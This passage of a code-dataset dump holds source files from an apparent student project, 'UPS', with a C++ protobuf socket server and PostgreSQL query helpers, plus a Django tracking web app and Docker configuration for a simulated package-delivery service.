\n" }, { "alpha_fraction": 0.6932404041290283, "alphanum_fraction": 0.6959684491157532, "avg_line_length": 31.663366317749023, "blob_id": "2f216889fb944529f6d1713864484f303a5288c3", "content_id": "93105dc91855c90542b104c60a1a7a725a2cb702", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3301, "license_type": "no_license", "max_line_length": 150, "num_lines": 101, "path": "/Server-App/server/worldMsg.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __WORLDMSG__\n#define __WORLDMSG__\n\n#include <thread>\n#include <chrono>\n#include \"world_ups.pb.h\"\n#include \"socket.hpp\"\n#include <string.h>\n#include <cstdlib>\n#include <cstdio>\n#include <google/protobuf/message.h>\n#include <google/protobuf/descriptor.h>\n#include <google/protobuf/io/zero_copy_stream_impl.h>\n#include <google/protobuf/io/coded_stream.h>\n#include <google/protobuf/io/zero_copy_stream_impl_lite.h>\n#include \"handle_requests.hpp\"\n#include <pqxx/pqxx>\n\nusing namespace std;\n\nclass worldMsg {\n static Connector connector;\n static google::protobuf::io::FileOutputStream * out;\n static google::protobuf::io::FileInputStream * in;\n static worldMsg * instance;\n static mutex mtx_in;\n static mutex mtx_out;\n // static worldMsg * mySelfPtr; \npublic:\n static worldMsg * getInstance(const char * host, const char * port);\nprivate: \n worldMsg() {} // Constructor? (the {} brackets) are needed here.\n void initizeTrucks(UConnect & uconnect,int number, int x, int y, connection * C);\npublic:\n worldMsg(worldMsg const&) = delete;\n void operator=(worldMsg const&) = delete;\n bool createWorld(bool isAmazon, google::protobuf::int64 worldId, bool isCreate, int numberTrucks, int x, int y, int & newCreatedId, connection * C);\n void goPickUp(int truckId, int whid, int seqnum);\n void goDeliver(int packageid, int x, int y, int truckid, int seqnum);\n void goQuery(int truckid, int seqnum);\n void changeSpeed(int semspeed);\n void sendAck(int ack);\n void disconnect(bool wantDisconnect);\n void recvResponse(UResponses & response);\n\n \n //this is adpated from code that a Google engineer posted online\n template<typename T> bool sendMesgTo(const T & message,\n\t\t google::protobuf::io::FileOutputStream *out) {\n lock_guard<mutex> lck(mtx_out);\n \n\n { //extra scope: make output go away before out->Flush()\n // We create a new coded stream for each message.\n // Don’t worry, this is fast.\n\n google::protobuf::io::CodedOutputStream output(out);\n // Write the size.\n const int size = message.ByteSize();\n output.WriteVarint32(size);\n uint8_t* buffer = output.GetDirectBufferForNBytesAndAdvance(size);\n if (buffer != NULL) {\n\t// Optimization: The message fits in one buffer, so use the faster\n\t// direct-to-array serialization path.\n\tmessage.SerializeWithCachedSizesToArray(buffer);\n } else {\n\t// Slightly-slower path when the message is multiple buffers.\n\tmessage.SerializeWithCachedSizes(&output);\n\tif (output.HadError()) {\n\t return false;\n\t}\n }\n }\n out->Flush();\n return true;\n }\n\n //this is adpated from code that a Google engineer posted online\n template<typename T> bool recvMesgFrom(T & message,\n\t\t\t google::protobuf::io::FileInputStream * in ){\n lock_guard<mutex> lck(mtx_in);\n google::protobuf::io::CodedInputStream input(in);\n uint32_t size;\n if (!input.ReadVarint32(&size)) {\n return false;\n }\n // Tell the stream not to read beyond that size.\n google::protobuf::io::CodedInputStream::Limit limit = 
input.PushLimit(size);\n // Parse the message.\n if (!message.MergeFromCodedStream(&input)) {\n return false;\n }\n if (!input.ConsumedEntireMessage()) {\n return false;\n }\n // Release the limit.\n input.PopLimit(limit);\n return true;\n }\n};\n#endif\n" }, { "alpha_fraction": 0.6188271641731262, "alphanum_fraction": 0.6234567761421204, "avg_line_length": 28.5, "blob_id": "084683a7d2a39e93410f49eeef30e25d21ae8ce2", "content_id": "02a91870086772a20c7fb9378bbf09cd78d844b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 70, "num_lines": 22, "path": "/Django-App/web-app/accounts/forms.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django import forms\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget = forms.PasswordInput)\n\n class Meta:\n model = User\n fields = ['username', 'password']\n help_texts = {\n 'username': ('Please create your username'),\n }\n\n def clean_password(self):\n password = self.cleaned_data.get('password')\n\n if len(password) < 6:\n raise forms.ValidationError(\"Your password is too short.\")\n elif len(password) > 20:\n raise forms.ValidationError(\"Your password is too long.\")\n\n return password" }, { "alpha_fraction": 0.7229007482528687, "alphanum_fraction": 0.7244274616241455, "avg_line_length": 27.478260040283203, "blob_id": "ca728361aff8dec051fcfeed1cca94d889ab5a8e", "content_id": "e0aedfc3766be00f10005744d5c5b4117ea3392a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 67, "num_lines": 46, "path": "/Django-App/web-app/upsApp/views.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "import operator\nfrom django.db.models import Q\nfrom functools import reduce\nfrom django.shortcuts import render\nfrom django.views import generic\nfrom .models import Package, Truck\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic.edit import UpdateView\nfrom django.urls import reverse_lazy\n\n\nclass PackageListView(LoginRequiredMixin, generic.ListView):\n model = Package\n\n def get_queryset(self):\n return Package.objects.filter(owner=self.request.user)\n\n\nclass ShipmentListView(generic.ListView):\n model = Package\n template_name_suffix = '_all_list'\n\n\nclass PackageUpdate(LoginRequiredMixin, UpdateView):\n model = Package\n fields = ['xPosition', 'yPosition', 'destRequiredUpdated']\n template_name_suffix = '_update_form'\n success_url = reverse_lazy('upsApp:packages')\n\n\nclass ShipmentSearchListView(ShipmentListView):\n \"\"\"\n Display a Blog List page filtered by the search query.\n \"\"\"\n paginate_by = 10\n\n def get_queryset(self):\n result = super(ShipmentSearchListView, self).get_queryset()\n\n query = self.request.GET.get('q')\n if query:\n # query_list = query.split()\n result = result.filter(packageId=query)\n\n return result\n" }, { "alpha_fraction": 0.6011844277381897, "alphanum_fraction": 0.6106598973274231, "avg_line_length": 29.266666412353516, "blob_id": "4002f2efa595169ac09d141f148b3c3b3e6bd17f", "content_id": "a3fbefb050a99b98482ffdeaa8d68a36052b5141", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5910, "license_type": "no_license", "max_line_length": 93, "num_lines": 
195, "path": "/Server-App/server/worldMsg.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"worldMsg.hpp\"\n \nConnector worldMsg::connector;\nworldMsg * worldMsg::instance = 0;\ngoogle::protobuf::io::FileOutputStream * worldMsg::out;\ngoogle::protobuf::io::FileInputStream * worldMsg::in;\nmutex worldMsg::mtx_in;\nmutex worldMsg::mtx_out;\n\nworldMsg * worldMsg::getInstance(const char * host, const char * port) {\n if (instance == 0) {\n instance = new worldMsg();\n cout << host << endl;\n cout << port << endl;\n connector = move(Connector(host, port));\n out = new google::protobuf::io::FileOutputStream(connector.getSocket());\n in = new google::protobuf::io::FileInputStream(connector.getSocket());\n }\n // Instantiated on first use.\n return instance;\n}\n\n// message UInitTruck{\n// required int32 id = 1;\n// required int32 x=2;\n// required int32 y=3;\n// }\n\n// message UConnect{\n// optional int64 worldid = 1;\n// repeated UInitTruck trucks=2;\n// required bool isAmazon = 3;\n// }\n \nbool worldMsg::createWorld(bool isAmazon,\n\t\t\t google::protobuf::int64 worldId,\n\t\t\t bool isCreate,\n\t\t\t int numberTrucks,\n\t\t\t int x,\n\t\t\t int y,\n\t\t\t int & newCreatedId,\n\t\t\t connection * C) {\n UConnect uconnect;\n if (!isCreate) {\n uconnect.set_worldid(worldId);\n } \n uconnect.set_isamazon(isAmazon);\n initizeTrucks(uconnect, numberTrucks, x, y, C);\n \n sendMesgTo(uconnect, out);\n UConnected response;\n recvMesgFrom(response, in);\n cout << \"Message is \" << endl;\n cout << response.DebugString();\n if (response.result() == \"connected!\") {\n newCreatedId = response.worldid();\n return true;\n }\n return false;\n}\n\nvoid worldMsg::goPickUp(int truckId, int whid, int seqnum) {\n UCommands ucommand;\n UGoPickup * ugopickup = ucommand.add_pickups();\n ugopickup->set_truckid(truckId);\n ugopickup->set_whid(whid);\n ugopickup->set_seqnum(seqnum);\n sendMesgTo(ucommand, out);\n}\n\n// message UDeliveryLocation{\n// required int64 packageid = 1;\n// required int32 x = 2;\n// required int32 y = 3;\n// }\n\n// message UGoDeliver{\n// required int32 truckid = 1;\n// repeated UDeliveryLocation packages = 2;\n// required int64 seqnum = 3;\n// }\n\nvoid worldMsg::goDeliver(int packageid, int x, int y, int truckid, int seqnum) {\n UCommands ucommand;\n UGoDeliver * ugodeliever = ucommand.add_deliveries();\n ugodeliever->set_truckid(truckid);\n UDeliveryLocation * package = ugodeliever->add_packages();\n package->set_packageid(packageid);\n package->set_x(x);\n package->set_y(y);\n ugodeliever->set_seqnum(seqnum);\n sendMesgTo(ucommand, this->out);\n}\n\nvoid worldMsg::goQuery(int truckid, int seqnum) {\n UCommands ucommand;\n UQuery * uquery = ucommand.add_queries();\n uquery->set_truckid(truckid);\n uquery->set_seqnum(seqnum);\n sendMesgTo(ucommand, this->out);\n}\n\nvoid worldMsg::changeSpeed(int simspeed) {\n UCommands ucommand;\n ucommand.set_simspeed(simspeed);\n sendMesgTo(ucommand, this->out);\n}\n\nvoid worldMsg::disconnect(bool wantDisconnect) {\n UCommands ucommand;\n ucommand.set_disconnect(wantDisconnect);\n sendMesgTo(ucommand, out);\n}\n\nvoid worldMsg::sendAck(int ack) {\n UCommands ucommand;\n ucommand.add_acks(ack);\n sendMesgTo(ucommand, out);\n}\n\nvoid worldMsg::initizeTrucks(UConnect & uconnect, int number, int x, int y, connection * C) {\n for (int i = 0; i < number; i++) {\n UInitTruck * newTruck = uconnect.add_trucks();\n newTruck->set_id(i);\n newTruck->set_x(x);\n newTruck->set_y(y);\n cout << \"debug information: Truck \" << i << 
endl;\n cout << newTruck->DebugString();\n insert_truck(C, to_string(i), \"ID\");\n }\n}\n\n\nvoid worldMsg::recvResponse(UResponses & response) {\n this_thread::sleep_for(std::chrono::milliseconds(1000));\n // UResponses response;\n recvMesgFrom(response, in);\n // if (response.completions_size() != 0) {\n // for (int i = 0; i < response.completions_size(); i++) {\n // cout << \"completions sent back \" << endl;\n // cout << response.completions(i).truckid() << endl;\n // cout << response.completions(i).x() << endl;\n // cout << response.completions(i).y() << endl;\n // cout << response.completions(i).status() << endl;\n // cout << response.completions(i).seqnum() << endl;\n // }\n // }\n \n // if (response.delivered_size() != 0) {\n // for (int i = 0; i < response.delivered_size(); i++) {\n // // update\n // // update(packageid, status);\n // cout << \"delievered sent back \" << endl;\n // cout << response.delivered(i).truckid() << endl;\n // cout << response.delivered(i).packageid() << endl;\n // cout << response.delivered(i).seqnum() << endl;\n // }\n // }\n \n // if (response.truckstatus_size() != 0) {\n // for (int i = 0; i < response.truckstatus_size(); i++) {\n // cout << \"truck status send back\" << endl;\n // cout << response.truckstatus(i).truckid() << endl;\n // cout << response.truckstatus(i).status() << endl;\n // cout << response.truckstatus(i).x() << endl;\n // cout << response.truckstatus(i).y() << endl;\n // cout << response.truckstatus(i).seqnum() << endl;\n // // // update(int truckId, int x, int y, string status); \n // }\n // }\n\n // // message UErr{\n // // required string err = 1;\n // // required int64 originseqnum = 2;\n // // required int64 seqnum = 3;\n // // } \n // if (response.error_size() != 0) {\n // for (int i = 0; i < response.error_size(); i++) {\n // cout << \"error sent back \" << endl;\n // cout << response.error(i).err() << endl;\n // cout << response.error(i).originseqnum() << endl;\n // cout << response.error(i).seqnum() << endl;\n // }\n // }\n // if (response.has_finished()) {\n // cout << \"finished snet back \" << response.finished() << endl;\n // }\n // if (response.acks_size() != 0) {\n // for (int i = 0; i < response.acks_size(); i++) {\n // cout << \"ack sent back\" << endl;\n // cout << response.acks(i) << endl;\n // }\n // }\n \n}\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5871760845184326, "alphanum_fraction": 0.591567873954773, "avg_line_length": 26.518293380737305, "blob_id": "9c347eaa59fdd35306f40a52affa344078cb743a", "content_id": "74cb3ef0c653c7d026b5bf2172a9d7fe1e48f9a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4554, "license_type": "no_license", "max_line_length": 99, "num_lines": 164, "path": "/Server-App/server/socket.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"socket.hpp\"\n\nSocket::Socket() : socket_fd(-1) {}\n\nSocket::Socket(int __socket_fd) : socket_fd(__socket_fd) {}\n\nSocket::Socket(Socket && rhs) noexcept {\n socket_fd = exchange(rhs.socket_fd, -1); // avoid double closing socket\n}\n\nSocket& Socket::operator=(Socket && rhs) noexcept {\n if (this != &rhs) {\n std::swap(socket_fd, rhs.socket_fd);\n }\n return * this;\n}\n\n\nbool Socket::isValid() {\n return socket_fd > -1;\n}\n\n\nSocket::~Socket() {\n if (socket_fd > -1) {\n cout << \"closing socket \" << this->socket_fd << endl;\n auto status = TEMP_FAILURE_RETRY(close(socket_fd));\n if (status == -1) {\n perror(\"Close Socket Failed\");\n } \n 
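// note: TEMP_FAILURE_RETRY above re-issues close() only while it fails with\n    // errno == EINTR, so an interrupting signal cannot leak the descriptor\n  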
}\n}\n\nListener::Listener(const char * _port) : Socket(), port(_port) {\n  int status;\n  struct addrinfo host_info;\n  struct addrinfo * host_info_list;\n  const char * hostname = NULL;\n\n  memset(&host_info, 0, sizeof(host_info));\n  host_info.ai_family = AF_UNSPEC;\n  host_info.ai_socktype = SOCK_STREAM;\n  host_info.ai_flags = AI_PASSIVE;\n\n  status = getaddrinfo(hostname, port, &host_info, &host_info_list);\n\n  \n  if (status != 0) {\n    cerr << \"Error: cannot get address info for host\" << endl;\n    cerr << \"  (\" << (hostname ? hostname : \"(null)\") << \",\" << port << \")\" << endl;\n    // throw exception\n    \n  }\n\n  socket_fd = socket(host_info_list->ai_family,\n\t\t     host_info_list->ai_socktype,\n\t\t     host_info_list->ai_protocol);\n\n  if (socket_fd == -1) {\n    cerr << \"Error: cannot create socket\" << endl;\n    cerr << \"  (\" << (hostname ? hostname : \"(null)\") << \",\" << port << \")\" << endl;\n    // throw exception \n  }\n\n  int yes = 1;\n  status = setsockopt(socket_fd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));\n  status = bind(socket_fd, host_info_list->ai_addr, host_info_list->ai_addrlen);\n  if (status == -1) {\n    cerr << \"Error: cannot bind socket\" << endl;\n    cerr << \"  (\" << (hostname ? hostname : \"(null)\") << \",\" << port << \")\" << endl;\n    // throw exception\n  }\n\n  status = listen(socket_fd, 100);\n  if (status == -1) {\n    cerr << \"Error: cannot listen on socket\" << endl;\n    cerr << \"  (\" << (hostname ? hostname : \"(null)\") << \",\" << port << \")\" << endl;\n    // throw exception\n  }\n  freeaddrinfo(host_info_list);\n}\n\nListener::~Listener(){}\n\nSocket Listener::Accept() {\n  struct sockaddr_storage socket_addr;\n  socklen_t socket_addr_len = sizeof(socket_addr);\n  int client_connection_fd;\n  // throw 7;\n  client_connection_fd = accept(socket_fd, (struct sockaddr *)&socket_addr, &socket_addr_len);\n  // cout << client_connection_fd << endl;\n  if (client_connection_fd == -1) {\n    cerr << \"Error: cannot accept connection on socket\" << endl;\n    // throw exception\n  }\n  return Socket(client_connection_fd); // plain return enables copy elision\n}\n\n// move the Socket base via the base-initializer; constructing a temporary\n// Socket(move(rhs)) in the body would immediately close the stolen descriptor\nListener::Listener(Listener && rhs) noexcept : Socket(move(rhs)) {\n  swap(this->port, rhs.port);\n}\n\nListener & Listener::operator=(Listener && rhs) noexcept {\n  if (this != &rhs) {\n    Socket::operator=(std::move(rhs));\n    swap(this->port, rhs.port);\n  }\n  return *this;\n}\n\nConnector::Connector(const char * _host, const char * _port) : Socket(), host(_host), port(_port) {\n  int status;\n  struct addrinfo host_info;\n  struct addrinfo *host_info_list;\n  memset(&host_info, 0, sizeof(host_info));\n  host_info.ai_family = AF_UNSPEC;\n  host_info.ai_socktype = SOCK_STREAM;\n\n  status = getaddrinfo(host, port, &host_info, &host_info_list);\n  if (status != 0) {\n    cerr << \"Error: cannot get address info for host\" << endl;\n    cerr << \"  (\" << host << \",\" << port << \")\" << endl;\n    // throw exception\n  } \n\n  socket_fd = socket(host_info_list->ai_family,\n\t\t     host_info_list->ai_socktype,\n\t\t     host_info_list->ai_protocol);\n  if (socket_fd == -1) {\n    cerr << \"Error: cannot create socket\" << endl;\n    cerr << \"  (\" << host << \",\" << port << \")\" << endl;\n    // throw exception\n  } \n\n  status = connect(socket_fd, host_info_list->ai_addr, host_info_list->ai_addrlen);\n  if (status == -1) {\n    cerr << \"Error: cannot connect to socket\" << endl;\n    cerr << \"  (\" << host << \",\" << port << \")\" << endl;\n    // throw exception\n  } \n  cout << \"socket_fd in Connector(): \" << socket_fd << endl;\n  freeaddrinfo(host_info_list);\n}\n\n// same base-initializer fix as the Listener move constructor above\nConnector::Connector(Connector && rhs) noexcept : Socket(move(rhs)) {\n  // port = exchange(rhs.port, nullptr);\n  // host = exchange(rhs.host, 
nullptr);\n swap(port, rhs.port);\n swap(host, rhs.host);\n} \n \nConnector & Connector::operator=(Connector && rhs) noexcept {\n // cout << rhs.socket_fd << endl;\n if(this != &rhs) {\n Socket::operator=(move(rhs));\n swap(port, rhs.port);\n swap(host, rhs.host);\n }\n return * this;\n}\n\nConnector::~Connector() {}\n\n\n\n\n\n\n\n\t\t \n\n\n\n\n\t\t \n\t\t \n\n\t\t \n\n" }, { "alpha_fraction": 0.7786885499954224, "alphanum_fraction": 0.8032786846160889, "avg_line_length": 19.5, "blob_id": "9656cb13903e4230aaf3dbe944c279471d43060b", "content_id": "bcd7e1291774247121515d474383656d36b42a7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 122, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/Django-App/web-app/Dockerfile", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "FROM python:3\nENV PYTHONUNBUFFERED 1\nRUN mkdir /webapp\nCOPY . /webapp\nWORKDIR /webapp\nRUN pip3 install -r requirements.txt" }, { "alpha_fraction": 0.5313953757286072, "alphanum_fraction": 0.5779069662094116, "avg_line_length": 21, "blob_id": "ae35be4ad2da0bca30984a084a6b8c6026625852", "content_id": "7d0331c31884d7af0cddffef1c2281a92cbcf97f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 860, "license_type": "no_license", "max_line_length": 135, "num_lines": 39, "path": "/docker-compose.yml", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "version: \"2\"\n\nservices:\n db:\n image: postgres\n environment:\n POSTGRES_DB: ups_db\n POSTGRES_USER: postgres\n POSTGRES_PASSWORD: password\n volumes:\n - pgdata:/var/lib/postgresql/data\n front-end:\n build: ./Django-App/web-app\n command: bash -c \"python3 manage.py makemigrations upsApp && python3 manage.py migrate && python3 manage.py runserver 0.0.0.0:8000\"\n volumes:\n - \"./Django-App/web-app:/serverDir\"\n ports:\n - \"8000:8000\"\n depends_on:\n - db\n links:\n - db\n backend:\n build: ./Server-App/server\n command: bash -c \"make clean && make && ./server\" # backend\n volumes:\n - \"./Server-App/server:/serverDir\"\n depends_on:\n - front-end\n links:\n - db\n - front-end\n ports:\n - \"44444\"\n - \"44444:44444\"\n expose:\n - \"44444\"\nvolumes:\n pgdata: \n\n" }, { "alpha_fraction": 0.6009036302566528, "alphanum_fraction": 0.6033132672309875, "avg_line_length": 30.022430419921875, "blob_id": "2a7d315f74bb7960c1b5a166a8ee8236cbc22678", "content_id": "3e12a9c76a5b882db9b02046ad3cbad1455939fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 16600, "license_type": "no_license", "max_line_length": 526, "num_lines": 535, "path": "/Server-App/server/handle_requests.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"handle_requests.hpp\"\n\n\nusing namespace std;\nusing namespace pqxx;\n\nmutex c_mutex;\n \nvoid get_parameter_based_on_dest(connection * C, vector< vector<string> > & my_vec){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n bool val = true;\n string sql = \"SELECT \\\"packageId\\\", \\\"xPosition\\\", \\\"yPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"destRequiredUpdated\\\" = \" + W.quote(val) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res;\n int index = 0;\n\n for(res = R.begin(); res != R.end(); res++){\n if(res == R.end())\n break;\n my_vec[index].push_back(res[0].as<string>());\n my_vec[index].push_back(res[1].as<string>());\n 
my_vec[index].push_back(res[2].as<string>());\n string packageid = res[0].as<string>();\n string xposition = res[1].as<string>();\n string yposition = res[2].as<string>();\n \n bool update = false;\n sql = \"UPDATE \\\"upsApp_package\\\" SET \\\"destRequiredUpdated\\\" = \" + W.quote(update) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \"AND \\\"xPosition\\\" = \" + W.quote(xposition) + \" AND \\\"yPosition\\\" = \" + W.quote(yposition) + \" ;\";\n W.exec(sql);\n index++;\n }\n\nmy_vec.resize(index);\nW.commit();\n\n}\n\n\n\nstring get_owner_id_from_username(connection * C, string username){\n // lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT id FROM auth_user WHERE username = \" + W.quote(username) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string owner_id = res[0].as<string>();\n return owner_id;\n}\n\n\n\n\nint max_sequence_num(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT sequence_id FROM \\\"upsApp_sequence_number\\\" ORDER BY sequence_id DESC;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n if(res == R.end())\n return 0;\n else{\n\n int val = res[0].as<int>();\n return val;\n }\n\n\n}\n\nint max_package_num(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT \\\"packageId\\\" FROM \\\"upsApp_package\\\" ORDER BY \\\"packageId\\\" DESC;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n if(res == R.end())\n return 0;\n else{\n\n int val = res[0].as<int>();\n return val;\n }\n\n\n}\n\n\nint max_order_id(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT order_id FROM \\\"upsApp_order_table\\\" ORDER BY order_id DESC;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n if(res == R.end())\n return 0;\n else{\n\n int val = res[0].as<int>();\n return val;\n }\n\n}\n\n\n\n\nvoid drop_all_tables(connection * C){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"DROP TABLE IF EXISTS \\\"upsApp_sequence_number\\\", \\\"upsApp_order_table\\\", \\\"upsApp_current_world\\\", \\\"upsApp_truck\\\", \\\"upsApp_package\\\" ;\";\n W.exec(sql);\n W.commit();\n}\n\n\nvoid packed_packages(connection * C, vector<int> & package_vec, string whx_position, string why_position, string truck_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string packed = \"PD\";\n string sql = \"SELECT \\\"packageId\\\" FROM \\\"upsApp_package\\\" WHERE \\\"whxPosition\\\" = \" + W.quote(whx_position) + \" AND \\\"whyPosition\\\" = \" + W.quote(why_position) + \" AND status = \" + W.quote(packed) + \" AND \\\"truck_id\\\" = \" + W.quote(truck_id) + \" ORDER BY \\\"packageId\\\" ASC ;\";\n result R = W.exec(sql);\n for (result::const_iterator res = R.begin(); res != R.end(); res++){\n\n int packageid = res[0].as<int>();\n package_vec.push_back(packageid);\n \n } \n}\n\n\n\n\nbool packageExist(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT COUNT(*) FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n int num = res[0].as<int>();\n if(num == 0)\n return false;\n else\n return true;\n\n}\n \n\nbool isExist(connection * C, string username){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql = \"SELECT COUNT(*) FROM auth_user WHERE username = \" + W.quote(username) + \" ;\";\n 
result R = W.exec(sql);\n result::const_iterator res = R.begin();\n int num = res[0].as<int>();\n if(num == 0)\n return false;\n else\n return true;\n }\n\n\nvoid insert_into_order_table(connection * C, string orderid, string package_num_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"INSERT INTO \\\"upsApp_order_table\\\"(order_id, package_num_id) VALUES ( \" + W.quote(orderid) + \" ,\" + W.quote(package_num_id) + \" );\";\n W.exec(sql);\n W.commit();\n\n}\n\nstring get_package_id_for_order(connection * C, string order_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT package_num_id FROM \\\"upsApp_order_table\\\" WHERE order_id = \" + W.quote(order_id) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string package = res[0].as<string>();\n return package;\n\n\n}\n\nstring get_order_id_for_package(connection * C, string package_id){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT order_id FROM \\\"upsApp_order_table\\\" WHERE package_num_id = \" + W.quote(package_id) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string order = res[0].as<string>();\n return order;\n}\n\n\n\nvoid update_location_of_package(connection * C, string x_position, string y_position, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"UPDATE \\\"upsApp_package\\\" SET \\\"xPosition\\\" = \" + W.quote(x_position) + \" , \\\"yPosition\\\" = \" + W.quote(y_position) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n W.commit();\n\n}\n\n\n\nvoid update_truck_field_of_package(connection * C, string packageid, string value){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"UPDATE \\\"upsApp_package\\\" SET truck_id = \" + W.quote(value) + \" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n W.commit();\n}\n\nvoid update_acked_of_seqnum(connection * C, string seq, bool val){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"UPDATE \\\"upsApp_sequence_number\\\" SET ackedornot = \" + W.quote(val) + \" WHERE sequence_id = \" + W.quote(seq) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n W.commit();\n\n}\n\n\nbool get_seqnum_acked_or_not(connection * C, string seqnum){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT ackedornot FROM \\\"upsApp_sequence_number\\\" WHERE sequence_id = \" + W.quote(seqnum) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n bool result = res[0].as<bool>();\n return result;\n}\n\n\n\n\nstring get_truck_id_for_a_particular_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT truck_id FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string truck_id = res[0].as<string>();\n return truck_id;\n}\n\nstring get_xposition_of_a_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"xPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string 
x_id = res[0].as<string>();\n return x_id;\n\n}\n\n\nstring get_yposition_of_a_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"yPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string y_id = res[0].as<string>();\n return y_id;\n}\n\nstring get_package_status(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT status FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string status = res[0].as<string>();\n return status;\n}\n\nstring get_item_description(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT item FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string item = res[0].as<string>();\n return item;\n\n}\n\nstring get_warehouse_id_of_package(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT whid FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string wh_id = res[0].as<string>();\n return wh_id;\n}\n\nstring get_warehouse_xposition(connection * C, string packageid){\n lock_guard<mutex> lock(c_mutex);\n work W(*C);\n string sql;\n sql = \"SELECT \\\"whxPosition\\\" FROM \\\"upsApp_package\\\" WHERE \\\"packageId\\\" = \" + W.quote(packageid) + \" ;\";\n result R = W.exec(sql);\n result::const_iterator res = R.begin();\n string x_id = res[0].as<string>();\n return x_id;\n}\n\n\nstring get_warehouse_yposition(connection * C, string packageid){\n lock_guard<mutex> 